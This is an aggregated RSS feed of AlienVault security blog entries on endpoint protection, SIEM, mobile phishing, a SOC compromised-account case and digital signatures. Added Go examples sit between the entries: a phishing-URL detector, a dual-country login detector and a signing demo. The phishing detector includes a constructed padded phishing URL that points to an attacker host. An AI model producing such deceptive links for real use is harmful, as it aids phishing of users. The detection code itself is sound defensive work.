www.secnews.physaphae.fr This is the RSS 2.0 feed from www.secnews.physaphae.fr. It is a simple aggregated flow of multiple article sources. The list of sources can be found on www.secnews.physaphae.fr. 2024-05-04T10:27:51+00:00 www.secnews.physaphae.fr AlienVault Blog - AlienVault is a major defensive player in IOCs What is endpoint protection? Endpoint security explained 70 percent of the most successful breaches originate at the endpoint. And, in today's work from home (WFH) landscape, more employees are connecting to internal networks from endpoints outside the office than ever before. The endpoint is one of an organization's largest exposures and an easy entry point for cybercriminals. Through a compromised endpoint, attackers can use your company's assets to execute code or exploit further vulnerabilities. Because endpoints include every device connected to your network, an attack can quickly become unmanageable if endpoints are not properly managed and secured. Why is endpoint protection difficult to achieve? With critical threats arriving continuously, prioritizing the most harmful ones is a constant struggle. Attacks today are smarter and more challenging to detect.
Ponemon'... 2020-08-12T15:19:00+00:00 https://feeds.feedblitz.com/~/633303254/0/alienvault-blogs~What-is-endpoint-protection-Endpoint-security-explained www.secnews.physaphae.fr/article.php?IdArticle=1856545 False Vulnerability,Threat None None AlienVault Blog - AlienVault is a major defensive player in IOCs Being onsite for an assessment is better, but a lot of it is possible remotely 2020-08-12T11:00:00+00:00 https://feeds.feedblitz.com/~/633269478/0/alienvault-blogs~Being-onsite-for-an-assessment-is-better-but-a-lot-of-it-is-possible-remotely www.secnews.physaphae.fr/article.php?IdArticle=1855783 False Guideline None None AlienVault Blog - AlienVault is a major defensive player in IOCs Cyber threat intelligence explained 2020-08-10T22:28:00+00:00 https://feeds.feedblitz.com/~/633193288/0/alienvault-blogs~Cyber-threat-intelligence-explained www.secnews.physaphae.fr/article.php?IdArticle=1854378 False Malware,Vulnerability,Threat None None AlienVault Blog - AlienVault is a major defensive player in IOCs Cybersecurity risk management explained 2020-08-10T17:40:00+00:00 https://feeds.feedblitz.com/~/633122188/0/alienvault-blogs~Cybersecurity-risk-management-explained www.secnews.physaphae.fr/article.php?IdArticle=1852410 False Vulnerability,Threat,Guideline None None AlienVault Blog - AlienVault is a major defensive player in IOCs Don't call it a SIEM – How USM Anywhere does threat detection and response differently Security Information and Event Management (SIEM) solutions have been the foundation of enterprises' security operations and threat detection and response. Even though USM Anywhere has many key SIEM features, it is much more than a SIEM. Why? To perform threat detection, SIEMs and purpose-built threat consoles collect data from security devices: network firewalls, endpoint devices and vulnerability managers, as well as data pulled directly from the cloud.
However, all too often, they collect disparate data sources without an organizing principle. Instead, SIEMs build bigger (and exponentially growing) data lakes of unnormalized log data without a quick and easy way to truly understand the data. Of course, this may work for the world's largest security operations teams, which have the resources to find the proverbial needles in the haystack, or to deploy complex analytics engines to help find those needles. SIEM vendors are now even offering orchestration solutions to automate the ever-increasing workload of alert triage and to assist the manual investigation of potential incidents. However, this does not solve the underlying problem. In the end, they are building more and bigger haystacks and then delivering increasingly complex and expensive technology to help security professionals sift through those stacks. But the underlying challenge of finding and responding to threats quickly has not been solved; in other words, security teams still cannot easily and quickly find the proverbial needles in the haystack. Legacy and big-data SIEMs require that an enterprise customer has an informed security team with the experience, expertise, and resources to sift through massive volumes of data and find the needles. This is unlikely to succeed. First, even the most well-funded security teams simply do not have the resources to keep up with the threats, and legacy and big-data SIEMs require exactly that. Second, these solutions help enterprises get the data in one place so that security teams can broadly query it to find threats; they do not actually help security professionals sift through the data intelligently and quickly. As SIEMs add even more assets to be monitored, they have to query dynamically against the asset data. Try doing this at scale against endpoint, network, asset, and other data, all from disparate sources. They simply cannot do it in real time.
What is AT&T Cybersecurity's approach and why is it different from others? A solution is only as good as its smarts. USM Anywhere starts with being a threat intelligence delivery vehicle. What does that mean? First, our solution centralizes all visibility in a single place like other solutions, but there is a key difference: it is designed to look at the right data. By correlating data from virtually anywhere, we can use common methods for consistency of data and to pull out key metadata. For example, USM Anywhere can get data from diverse network devices, such as firewalls, web gateways and cloud services, or from endpoints' network connections. That's the first step. Then, by focusing on threat actors and their tactics, techniques and procedures (TTPs), the data to be collected is really focused on the threats. Building on the network data example, USM Anywhere can look for network traffic indicative of connections to a command-and-control server even if the traffic originates from different sources. But it's not looking at all the traffic. USM Anywhere focus... 2020-08-10T11:00:00+00:00 https://feeds.feedblitz.com/~/633084536/0/alienvault-blogs~Don%e2%80%99t-call-it-a-SIEM-%e2%80%93-How-USM-Anywhere-does-threat-detection-and-response-differently www.secnews.physaphae.fr/article.php?IdArticle=1851624 False Vulnerability,Threat,Guideline None None AlienVault Blog - AlienVault is a major defensive player in IOCs How to secure Syslog with USM Anywhere 2020-08-06T11:00:00+00:00 https://feeds.feedblitz.com/~/632682652/0/alienvault-blogs~How-to-secure-Syslog-with-USM-Anywhere www.secnews.physaphae.fr/article.php?IdArticle=1844751 False None None None AlienVault Blog - AlienVault is a major defensive player in IOCs Combat mobile phishing attacks targeting Financial Services with AI Mobile internet traffic surpassed desktop traffic in 2014 and the gap continues to widen.
Attackers have noticed this trend and are getting a higher return on investment by phishing mobile devices. Lookout data shows that 1 in 50 enterprise users are phished on mobile devices daily and that mobile phishing rates have doubled for users of Office 365 and G Suite. This is a massive problem on a small screen. With the smaller screen and apps optimized for mobile, it is more challenging for consumers and employees to identify a phishing attack in the way they would on a laptop or desktop computer. Attackers know this and purposely use mobile-specific phishing techniques such as URL padding (a legitimate-looking hostname followed by a long run of hyphens, so that the real domain sits off the edge of a narrow address bar) and tiny URLs to further obfuscate the attack. Lookout data suggests that enterprise users are three times more likely to fall for a phishing link when it is presented on the small screen of a mobile device than on the screen of a desktop operating system like Windows or macOS. Financial services has embraced BYOD The other major shift in security is the adoption of personal devices for work. Historically, financial organizations have invested heavily in security solutions such as secure email gateways, inbox scanning, and end-user training to protect against Business Email Compromise (BEC) scams. They have also traditionally required that employees use heavily restricted corporate mobile devices for work. However, as financial firms increasingly adopt Bring Your Own Device (BYOD) mobile strategies, these techniques remain too narrowly focused on email and do not protect against phishing attacks that enter through modern messaging, such as SMS, Slack, and Microsoft Instant Messaging. Lookout's own data shows phishing encounter rates exceeding 21% in 1Q2020.
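The two obfuscation tricks named above, URL padding and shortened links, can be checked mechanically before a link is rendered or followed. The Go program below is an added example written for this page, not code from Lookout or AT&T Cybersecurity. The sample links, the shortener list and the four-hyphen padding threshold are constructed for illustration, and the "last two labels" rule is a simplification of registrable-domain logic that production code should replace with a Public Suffix List lookup.

```go
package main

import (
	"fmt"
	"net/url"
	"regexp"
	"strings"
)

// padRun matches the hyphen runs attackers use to push the real domain off the
// edge of a narrow mobile address bar. Four or more is a constructed threshold.
var padRun = regexp.MustCompile(`-{4,}`)

// Shorteners is a constructed list of link-shortening hosts. A real deployment
// would load a maintained list and expand the link in a sandbox instead.
var Shorteners = map[string]bool{"short.example": true, "tiny.example": true}

// Report is what an analyst (or an in-app link checker) needs to see about a URL.
type Report struct {
	Host            string
	DisplayedPrefix string // the part a small screen is likely to show
	EffectiveDomain string // the domain that will actually answer the request
	Padded          bool
	Shortened       bool
}

// Inspect parses a URL and extracts the signals described in the article.
func Inspect(raw string) (Report, error) {
	u, err := url.Parse(raw)
	if err != nil {
		return Report{}, err
	}
	host := strings.ToLower(u.Hostname())
	if host == "" {
		return Report{}, fmt.Errorf("no host in %q", raw)
	}
	r := Report{Host: host, DisplayedPrefix: host, EffectiveDomain: host}
	if loc := padRun.FindStringIndex(host); loc != nil {
		r.Padded = true
		r.DisplayedPrefix = host[:loc[0]] // what survives before the padding
	}
	// Simplification: treat the last two labels as the registrable domain.
	// Suffixes such as co.uk need the Public Suffix List to get this right.
	if labels := strings.Split(host, "."); len(labels) >= 2 {
		r.EffectiveDomain = strings.Join(labels[len(labels)-2:], ".")
	}
	r.Shortened = Shorteners[host]
	return r, nil
}

// Suspicious combines the two signals: padding that hides the real domain
// off-screen, and a shortener that hides it entirely until followed.
func Suspicious(r Report) bool {
	return r.Padded || r.Shortened
}

func main() {
	for _, raw := range []string{ // constructed sample links
		"http://m.example-bank.com----------------secure----verify.attacker.example/login",
		"https://short.example/AbC123",
		"https://login.example-bank.com/account",
	} {
		r, err := Inspect(raw)
		if err != nil {
			fmt.Println("error:", err)
			continue
		}
		fmt.Printf("%s shows %q, really %q, suspicious=%v\n",
			r.Host, r.DisplayedPrefix, r.EffectiveDomain, Suspicious(r))
	}
}
```

The padded sample is reported as showing `m.example-bank.com` while really belonging to `attacker.example`; the shortener is flagged because nothing can be said about its destination without expanding it; the plain bank login is left alone.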
Malicious URLs include ad fraud, botnets, command and control centers, links to malware, malware call-home, malware distribution points, phishing/fraud, spam URLs, ... 2020-08-05T11:00:00+00:00 https://feeds.feedblitz.com/~/632586046/0/alienvault-blogs~Combat-mobile-phishing-attacks-targeting-Financial-Services-with-AI www.secnews.physaphae.fr/article.php?IdArticle=1842906 False Spam,Malware,Threat,Guideline None None AlienVault Blog - AlienVault is a major defensive player in IOCs Stories from the SOC: Compromised account detected Dark Reading) The team took a deeper look and discovered the account was indeed compromised. The analyst team engaged the customer, who was able to take the appropriate actions and remediate the situation before anything more severe could occur. Investigation Initial Alarm Review Indicators of Compromise (IOCs) The initial alarm surfaced as the result of two login events originating from two different countries within nine minutes of each other. This irregular activity indicated that a user's account was likely compromised. [image: credential abuse detected] Foreign logins are nothing new; we see dozens of such alerts from multiple customers every day. Most of them are false positives caused by, for example, legitimate Virtual Private Network (VPN) or other tunnel services, or multi-factor authentication (MFA) traffic from valid users traveling overseas. Expanded investigation Alarm Detail With the rise of work from home due to COVID-19, alarms for dual geographical logins have been on the rise as well. With so much volume coming through for review, it is imperative to self-police the natural human tendency to base our view of future outcomes on past outcomes. Just because the last 200 were false positives does not mean the 201st alarm will be. Response Building the investigation One of the differences for this alarm that helped throw off any preconceived notions was the domain used by the account.
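A first-pass version of the alarm logic this story describes: two successful logins for one account from different countries within a short window, with the VPN-egress suppression the analyst names as the usual source of false positives, and a flag for accounts whose domain is not the customer's own. This Go program is an added example written for this page, not the USM Anywhere rule or any AT&T code. The log format, the addresses, the VPN range, the 15-minute window and the customer domain are all constructed for illustration.

```go
package main

import (
	"fmt"
	"net"
	"sort"
	"strings"
	"time"
)

// LoginEvent is one successful authentication parsed from a constructed log line:
//   2020-07-30T08:02:11Z user=a.lee@example.com ip=203.0.113.7 country=US result=success
type LoginEvent struct {
	Time    time.Time
	User    string
	IP      net.IP
	Country string
}

// Finding pairs two logins by one account that the geography cannot explain.
type Finding struct {
	User          string
	First, Second LoginEvent
	Gap           time.Duration
	ForeignDomain bool // the account's domain is not the customer's own domain
}

func parseLogin(line string) (LoginEvent, bool) {
	f := strings.Fields(line)
	if len(f) < 5 {
		return LoginEvent{}, false
	}
	ts, err := time.Parse(time.RFC3339, f[0])
	if err != nil {
		return LoginEvent{}, false
	}
	kv := map[string]string{}
	for _, s := range f[1:] {
		if i := strings.IndexByte(s, '='); i > 0 {
			kv[s[:i]] = s[i+1:]
		}
	}
	ip := net.ParseIP(kv["ip"])
	if kv["result"] != "success" || ip == nil || kv["user"] == "" {
		return LoginEvent{}, false // failed attempts do not establish presence
	}
	return LoginEvent{Time: ts, User: strings.ToLower(kv["user"]), IP: ip, Country: kv["country"]}, true
}

func inAny(ip net.IP, nets []*net.IPNet) bool {
	for _, n := range nets {
		if n.Contains(ip) {
			return true
		}
	}
	return false
}

// FindDualGeoLogins flags consecutive successful logins by the same account
// from different countries less than window apart. Pairs touching a known
// corporate VPN egress range are suppressed, the commonest benign cause.
func FindDualGeoLogins(lines []string, window time.Duration, homeDomain string, vpnCIDRs []string) []Finding {
	var vpn []*net.IPNet
	for _, c := range vpnCIDRs {
		if _, n, err := net.ParseCIDR(c); err == nil {
			vpn = append(vpn, n)
		}
	}
	byUser := map[string][]LoginEvent{}
	for _, l := range lines {
		if ev, ok := parseLogin(l); ok {
			byUser[ev.User] = append(byUser[ev.User], ev)
		}
	}
	var out []Finding
	for user, evs := range byUser {
		sort.Slice(evs, func(i, j int) bool { return evs[i].Time.Before(evs[j].Time) })
		for i := 1; i < len(evs); i++ {
			a, b := evs[i-1], evs[i]
			gap := b.Time.Sub(a.Time)
			if a.Country == b.Country || gap > window || inAny(a.IP, vpn) || inAny(b.IP, vpn) {
				continue
			}
			foreign := !strings.HasSuffix(user, "@"+strings.ToLower(homeDomain))
			out = append(out, Finding{User: user, First: a, Second: b, Gap: gap, ForeignDomain: foreign})
		}
	}
	sort.Slice(out, func(i, j int) bool { return out[i].User < out[j].User })
	return out
}

// SampleLogins are constructed for this example, not real customer data.
var SampleLogins = []string{
	"2020-07-30T08:02:11Z user=a.lee@example.com ip=203.0.113.7 country=US result=success",
	"2020-07-30T08:09:40Z user=a.lee@example.com ip=198.51.100.20 country=DE result=success", // corporate VPN egress
	"2020-07-30T09:15:02Z user=b.kim@partner.example ip=192.0.2.44 country=US result=success",
	"2020-07-30T09:23:31Z user=b.kim@partner.example ip=192.0.2.199 country=BR result=success",
	"2020-07-30T09:30:00Z user=c.ray@example.com ip=203.0.113.9 country=US result=failure",
	"2020-07-30T09:31:00Z user=c.ray@example.com ip=192.0.2.77 country=FR result=success",
}

func main() {
	for _, f := range FindDualGeoLogins(SampleLogins, 15*time.Minute, "example.com", []string{"198.51.100.0/24"}) {
		fmt.Printf("%s: %s -> %s in %v (third-party domain: %v)\n",
			f.User, f.First.Country, f.Second.Country, f.Gap, f.ForeignDomain)
	}
}
```

With the VPN range supplied, only the partner-domain account is reported (US to BR in under nine minutes, with the third-party flag set, which is the detail that warranted an investigation in the story); a.lee's second login comes from the corporate VPN egress and is suppressed, and c.ray's failed attempt is not treated as presence. Dropping the VPN list makes a.lee a second finding, which is the false-positive volume the analyst warns about.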
It was not the standard customer email / account name domain. A quick search on the company showed that the two companies were in the same industry, and it is not uncommon for companies to allow vendors or industry partners to keep their own domain for login IDs. But still, it caught my attention. Customer interaction [image: credential abuse communicated to customer] The obvious main consideration for these types of alarms is the geographies themselves. But with a third party in the equation, even explicitly knowing the geographies did not provide much additional information. Not knowing the full extent of the third party's geographic business, I had no idea whether the foreign country was a likely work location for their employees. Customer Response(s) Given all the unknowns, this had to be sent as an Investigation to the client to verify the activity. Upon review, it was determined that this was indeed a compromised account and the customer remediated the situation. As we have seen from the history of breaches, third pa... 2020-08-04T11:00:00+00:00 https://feeds.feedblitz.com/~/632452610/0/alienvault-blogs~Stories-from-the-SOC-Compromised-account-detected www.secnews.physaphae.fr/article.php?IdArticle=1841453 False Threat None None AlienVault Blog - AlienVault is a major defensive player in IOCs Managed security services explained: what is an MSSP? Vulnerability management – MSSPs help organizations identify, prioritize, and remediate known vulnerabilities that could be used by cybercriminals to gain access to applications, systems, and data. Vulnerability management services can range from simply providing vulnerability assessments of networks, systems, and applications (with the customer organization doing the remediation) to full-blown vulnerability management in which discovered vulnerabilities are also remediated through automated patching and system reconfiguration.
Intrusion management – Networks need to be continually monitored for possible cyberattacks. MSSPs use intrusion detection and intrusion prevention systems to look for and block anomalous network traffic that may be malicious in nature. Security technology management – MSSPs handle the daily management of advanced threat defense technologies, unified threat management, security gateways, firewalls, VPNs and more. Threat hunting – A service that proactively identifies and eradicates threats in your environment using computer forensics, cyber threat intelligence and malware analysis. Security compliance monitoring and management – Organizations required to prove that their security posture complies with government and industry regulations rely on MSSPs to assess, track and document the organization's adherence to mandates such as the Payment Card Industry Data Security Standard (PCI DSS), the European Union's General Data Protection Regulation (GDPR), and the Health Insurance Portability and Accountability Act (HIPAA). Why would organizations use an MSSP? Outsourcing such a critical aspect of business operations has to provide an organization with significant benefits. Given the material impact data breaches and ransomware attacks have had on organizations, with post-attack costs reaching into the tens of millions, the idea of putting the safety of the network into a provider's hands can be daunting. Even so, organizations choose to have MSSPs manage their security for a number of reasons: 1) Expertise – MSSPs maintain a staff of experts in many aspects of cybersecurity. Organizations concerned with cyberattacks and the fortification of their environment's security often find they lack internal expertise.
Outsourcing to an MSSP extends the internal IT team t... 2020-08-03T18:11:00+00:00 https://feeds.feedblitz.com/~/632405656/0/alienvault-blogs~Managed-security-services-explained-what-is-an-MSSP www.secnews.physaphae.fr/article.php?IdArticle=1840534 False Ransomware,Malware,Vulnerability,Threat,Patching None None AlienVault Blog - AlienVault is a major defensive player in IOCs Digital signatures security explained as far back as 1999, but in the intervening years came to be somewhat taken for granted by security engineers. Not any longer: the massive move to home working precipitated by the Covid-19 pandemic has forced many to take a fresh look at the security value of digital signatures, why they matter, and their relationship to encryption. We thought we'd do the same. In this article, we'll give you a refresher course on how digital signatures work, why they are important for security, and what the future holds. How do digital signatures work? Digital signatures, at the most fundamental level, are mathematical schemes used to validate the authenticity and integrity of an electronic message. This "message" could be an email, a credit card transaction, or a digital document. A digital signature ties a message to the holder of a particular private key, and can therefore be used not just to detect tampering with the contents of a message, but also to confirm that it was produced by the party it claims to come from. (A signature does not hide the contents; confidentiality is the job of encryption, which is why the two are so often used together.) At a deeper level, digital signatures work in two steps. First, a hash function is applied to the message, producing a fixed-length digest, a short string of numbers and letters. Second, the signer's private key is used to sign that digest, and anyone holding the corresponding public key can check the result. The private key plays no part in computing the hash itself. A good hash function makes the digest effectively unique to the message being hashed. It is also one-way, meaning the message cannot be recovered from the digest, and collision-resistant, meaning it is infeasible to find a second message that produces the same digest. Collision resistance is the property that matters most for signatures, because a colliding document would carry the same valid signature.
The best-known hashing algorithms are Message Digest 5 (MD5), Secure Hash Algorithm-1 (SHA-1) and the SHA-2 family (of which SHA-256 is the most widely used member). MD5 and SHA-1 are no longer collision-resistant and should not be used for new signatures; SHA-256 or stronger is the practical choice today. The importance of digital signatures The value of digital signatures has long been recognized, but recent events have meant that they are being deployed at an unprecedented rate. This is because digital signatures allow users to communicate securely when working remotely, which more than half of US workers did even before the pandemic, without the need for a permanent, sustained encrypted connection. More specifically, digital signatures allow three factors about a message to be verified: Authentication. Because, in most implementations, a digital signature is created with the sender's private signing key, anyone holding the sender's public key can verify that the message came from the holder of that private key. Data Integrity. Because the signed digest covers the entire message, if any part of the message changes, so does the digest. If a message is intercepted and altered in transit, the signature verification performed by the recipient fails, which gives the recipient an easy way to check that the data has not been tampered with. 2020-08-03T11:00:00+00:00 https://feeds.feedblitz.com/~/632326920/0/alienvault-blogs~Digital-signatures-security-explained www.secnews.physaphae.fr/article.php?IdArticle=1840535 True Tool None None AlienVault Blog - AlienVault is a major defensive player in IOCs Digital signatures 101: A powerful and underused cybersecurity ally as far back as 1999, but in the intervening years came to be somewhat taken for granted by security engineers. Not any longer: the massive move to home working precipitated by the Covid-19 pandemic has forced many to take a fresh look at the value of digital signatures, why they matter, and their relationship to encryption. We thought we'd do the same.
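The hash-then-sign flow the digital-signature entries above describe, worked through in Go with ECDSA over P-256 and SHA-256 from the standard library. This is an added example written for this page, not code from the article's authors. The message text and the two key holders (Alice, the legitimate signer, and Mallory, who signs the same message with her own key) are constructed. It exercises the checks the article lists: a genuine signature verifies, a single changed byte breaks verification (integrity), and a signature made with someone else's key does not verify against Alice's public key (authentication).

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/sha256"
	"fmt"
)

// Sign hashes the message with SHA-256 and signs the digest with the private
// key. The private key plays no part in computing the digest; it only signs
// it. SHA-256 is used because MD5 and SHA-1 are no longer collision-resistant.
func Sign(priv *ecdsa.PrivateKey, msg []byte) ([]byte, error) {
	digest := sha256.Sum256(msg)
	return ecdsa.SignASN1(rand.Reader, priv, digest[:])
}

// Verify recomputes the digest over the message as received and checks the
// signature against the claimed sender's public key. Any change to the
// message changes the digest, so the check fails.
func Verify(pub *ecdsa.PublicKey, msg, sig []byte) bool {
	digest := sha256.Sum256(msg)
	return ecdsa.VerifyASN1(pub, digest[:], sig)
}

// Outcome records the three properties the article describes.
type Outcome struct {
	Genuine     bool // untouched message, right key: must verify
	Tampered    bool // modified message, right key: must fail (integrity)
	WrongSigner bool // same message signed by someone else: must fail (authentication)
}

// Demo generates keys for two parties and runs the three checks.
func Demo() (Outcome, error) {
	alice, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		return Outcome{}, err
	}
	mallory, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		return Outcome{}, err
	}
	msg := []byte("Pay 100.00 to account 12345") // constructed message
	sig, err := Sign(alice, msg)
	if err != nil {
		return Outcome{}, err
	}
	forged, err := Sign(mallory, msg) // Mallory's key, not Alice's
	if err != nil {
		return Outcome{}, err
	}
	tampered := []byte("Pay 900.00 to account 12345") // one byte changed in transit
	return Outcome{
		Genuine:     Verify(&alice.PublicKey, msg, sig),
		Tampered:    Verify(&alice.PublicKey, tampered, sig),
		WrongSigner: Verify(&alice.PublicKey, msg, forged),
	}, nil
}

func main() {
	o, err := Demo()
	if err != nil {
		panic(err)
	}
	fmt.Printf("genuine=%v tampered=%v wrong-signer=%v\n", o.Genuine, o.Tampered, o.WrongSigner)
}
```

Note that the recipient needs a trustworthy copy of Alice's public key for the authentication check to mean anything; that binding of key to identity is what certificates and a PKI provide, and it is outside what the signature itself proves.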
2020-08-03T11:00:00+00:00 https://feeds.feedblitz.com/~/632326920/0/alienvault-blogs~Digital-signatures-A-powerful-and-underused-cybersecurity-ally www.secnews.physaphae.fr/article.php?IdArticle=1839063 False Tool None None AlienVault Blog - AlienVault is a major defensive player in IOCs Secure remote access explained Endpoint security is a process that can be carried out through both policy and software and encompasses securing various endpoints (mobile devices, laptops, desktops, servers, IoT devices) on a network. Key functions of endpoint security include antivirus and firewall checking, ensuring patches are up to date, preventing dangerous processes from running, and keeping confidential data from being cached. Network access control (NAC) – Network access is controlled and managed through a combination of authentication, endpoint security measures, and enforcement of network security policy. Single sign-on (SSO) – Enables users to authenticate to and access various applications and resources with one set of login credentials. Privileged access management (PAM) – Privileged access management can take on different meanings; but generally speaking, PAM is a set of tools for securing, managing, and monitoring access to an enterprise's data from privileged accounts. Why is secure remote access important? With the work from home shift in the workforce, endpoints are accessing corporate networks from multiple locations.
Today, employees' home networks are often the originating point for network connections, multiplying the risk on both home and corporate networks. Antiquated security measures must be replaced with solutions in syn... 2020-07-31T15:03:00+00:00 https://feeds.feedblitz.com/~/632051116/0/alienvault-blogs~Secure-remote-access-explained www.secnews.physaphae.fr/article.php?IdArticle=1835309 False Malware None None AlienVault Blog - AlienVault is a major defensive player in IOCs In hard times, solve big problems and do your best work Ed Amoroso. There's something eerily familiar about the COVID-19 pandemic for us in the technology world. It's not the striking similarity to the Hollywood "end-of-the-world" movies we have all seen. No, it's more about the fear and uncertainty that accompanies an economic downturn: the feeling that "the party is over, and this time the economy may never recover." Even if our own company is doing well, we see so many of our friends and customers struggling in travel, leisure, transportation, retail and other industries. Of course, we all should know that "what goes up must come down," and vice versa. But when you are up the proverbial waterway without the requisite navigation aid, it's easy to feel glum. And not for nothing, by the way: companies are cutting salaries across the board. Unemployment runs as high as 15% in some parts of the country. And although the cybersecurity job market remains strong, things are changing fast, and there are never any promises for the future. The pessimistic economic outlook got us (Ed and Roger) talking about a previous "this time it's different" economic collapse: the dot-com crash back in 2001. Back then, I (Roger) was working as a technology "fixer," the guy you called in to help pull good companies out of bad circumstances. It was gratifying to bring them back to life, but reducing headcount was usually part of the equation and was never easy, particularly during the downturn.
It was in that context that a friend invited me to speak at a software conference held at what was then the Cypress Hotel in Cupertino. "No need to prepare anything," he said, "just come as you are." I accepted without thinking. As a member of the team that launched Java at Sun Microsystems, I had routinely presented at technical conferences. As it turned out, however, this was no technical conference; it was a job fair, offering career advice to out-of-work software engineers (some of whom I may have had a hand in putting out of work). "What am I going to say to them?" I asked my friend. "I'm a consultant. I don't know anything about recruiting or job hunting!" "Yes, but you're the busiest guy I know," he responded. "Just share ideas on how to get back to work." For thirty-five minutes, I sat silently on the stage. The professional panelists before me presented successively more pessimistic views of the economic future. They had professional slides with grim figures and colorful charts featuring upside-down V's. "Nasdaq down 77%. 415,000 jobs lost within a month. Billions in market capitalization gone. Millions of jobs outsourced to India, and never coming back. Few opportunities on the horizon." It was really hard to watch. As my turn to speak drew near, I could think of just one thing: "I have to say something positive. I can't bear to let this close on such a dismal note!" I was looking out at a room full of hundreds of super-smart engineers who had worked hard to get to where they were, only to have it all snatched away by the collapse of the stupid dot-com bubble, 9/11, and some accounting scandals. So much wasted talent. But that gave me an idea! "How many of you worked tirelessly to earn a degree in engineering, math or science?" I asked the audience. Hands shot up throughout the room.
"And how many of you actually ended up with a six-figure salary for shuttling data between a web form and a database?" Nearly all still had their hands in the air, as an uneasy chuckle swi... 2020-07-20T11:00:00+00:00 https://feeds.feedblitz.com/~/630955569/0/alienvault-blogs~In-hard-times-solve-big-problems-and-do-your-best-work www.secnews.physaphae.fr/article.php?IdArticle=1814583 False Guideline None None AlienVault Blog - AlienVault is a major defensive player in IOCs 3 Steps to better cybersecurity in touchless business solutions (Part 3 of 3) In Part 1 and Part 2 of this series, we covered the first two steps to better cybersecurity in touchless business solutions: practicing extra caution with cashless payment solutions, and heightening cybersecurity and data protection protocols. We conclude this series by discussing the third step to improve cybersecurity for touchless systems, which is to automate wherever possible through innovative technologies. We will discuss automation being implemented in two industries severely affected by the pandemic, with recommended preventive measures against cyber-attacks that keep both business and clients secure. Automate wherever possible through innovative technologies The food industry is probably one of the most affected in the wake of the pandemic. Restaurants had to close almost immediately. From established food chains to small business operators, the need to quarantine nearly drove the market to a standstill. But since food is an essential industry, it cannot simply be shut down. Food delivery and take-out became the only way for these businesses to continue serving their communities. Employers needed to implement strategies to keep their teams and stay in business amid the pandemic. But what happens when these establishments open their doors to the public once more?
In the "new normal" we are all gearing up for, restaurants can only operate at around 50% capacity. Technology integration is essential to preserve the human touch. Here are some examples of how automation can be applied in this industry: ● Online sales and delivery Restaurants can now expect more revenue to come from online sales and delivery; as the population reels from the effects of the pandemic, going to a restaurant may be low on people's list of priorities, but eating is not. Food businesses need to bring the offline experience they give their customers online without losing the uniqueness of the experience their brand can offer. Food distributors are also affected, because it became harder to move their warehouse inventory. So, instead of relying solely on doing business with restaurants, hotels, and the like, they now have to go direct to consumers through online sales and delivery. Food warehouses and even food production services would also have to automate where possible, such as inventory maintenance and logistics. Walk-up operations, together with online ordering systems, can also be put in place. ● Automated retail Even before the global pandemic, the retail industry had been driving towards automation and customer-centricity. Creating touchless supply chains and automating wherever feasible is now possible through innovative technologies such as Artificial Intelligence (AI), Machine Learning (ML), and the Internet of Things (IoT).
AI helps you get to know your consumers better, while ML helps you plan better b... 2020-07-16T11:00:00+00:00 https://feeds.feedblitz.com/~/t/0/0/alienvault-blogs/~/https://cybersecurity.att.com/blogs/security-essentials/3-steps-to-better-cybersecurity-in-touchless-business-solutions-part-3-of-3~Steps-to-better-cybersecurity-in-touchless-business-solutions-Part-of www.secnews.physaphae.fr/article.php?IdArticle=1807695 False None None None AlienVault Blog - AlienVault is a major defensive player in IOCs Vulnerability scanning explained 2020-07-16T06:00:00+00:00 https://feeds.feedblitz.com/~/t/0/0/alienvault-blogs/~/https://cybersecurity.att.com/blogs/security-essentials/vulnerability-scanning-what-is-it-and-what-are-the-benefits~Vulnerability-scanning-explained www.secnews.physaphae.fr/article.php?IdArticle=1807189 False Vulnerability,Threat None None AlienVault Blog - AlienVault is a major defensive player in IOCs AlienApps Roundup - Box, Cloudflare, Palo Alto Networks, Salesforce, ServiceNow, Zscaler, Checkpoint [image: AlienApps top reports] [image: AlienApps top users] Our integrations go deeper than just data collection, alarming on dangerous events, and visualizations. All these apps also contain either notification or response actions. Response actions are exactly what they sound like. Say an alarm is triggered because someone on the network is communicating with a known malware command-and-control (C&C) server. The most obvious quick fix is to block access to the C&C so the team can assess the threat posed by the device and take other actions as needed. This is exactly the kind of action we support with many vendors.
Without leaving the USM Anywhere console or loggin... 2020-07-15T11:00:00+00:00 https://feeds.feedblitz.com/~/t/0/0/alienvault-blogs/~/https://cybersecurity.att.com/blogs/security-essentials/alienapps-roundup-box-cloudflare-palo-alto-networks-salesforce-servicenow-zscaler-checkpoint~AlienApps-Roundup-Box-Cloudflare-Palo-Alto-Networks-Salesforce-ServiceNow-Zscaler-Checkpoint www.secnews.physaphae.fr/article.php?IdArticle=1805474 False Malware,Threat,Guideline None None AlienVault Blog - AlienVault is a major defensive player in IOCs Security as a Service explained 2020-07-15T07:01:00+00:00 https://feeds.feedblitz.com/~/t/0/0/alienvault-blogs/~/https://cybersecurity.att.com/blogs/security-essentials/security-as-a-service-explained~Security-as-a-Service-explained www.secnews.physaphae.fr/article.php?IdArticle=1805231 False Vulnerability,Threat None None AlienVault Blog - AlienVault is a major defensive player in IOCs The damaging impact data breaches have on American society as a whole particularly susceptible to security hacks, but even large corporations are not immune. Consumers may assume big companies have the best security systems in place, but hackers are savvy and can find their way around these measures. One of the biggest data breaches in recent memory was the Marriott International breach, in which attackers had access from 2014 to 2018 and valuable information on over 500 million customers was stolen. The hackers were able to get into the Starwood hotel brand's system and remain there after Marriott acquired the company, giving them access to an even greater array of data. Not only did this breach expose many customers' private information, it also affected foreign politics: the attack was reportedly traced back to Chinese hackers, which may influence one of the biggest trade deals in modern U.S. history. Data breaches go far beyond customers needing to get new credit cards. They can drastically affect consumer trust and even foreign affairs.
In the long term, the devastation caused by such hacks can be even worse than most people, businesses, and politicians realize.
Quantifying the loss and damages that result from a data breach
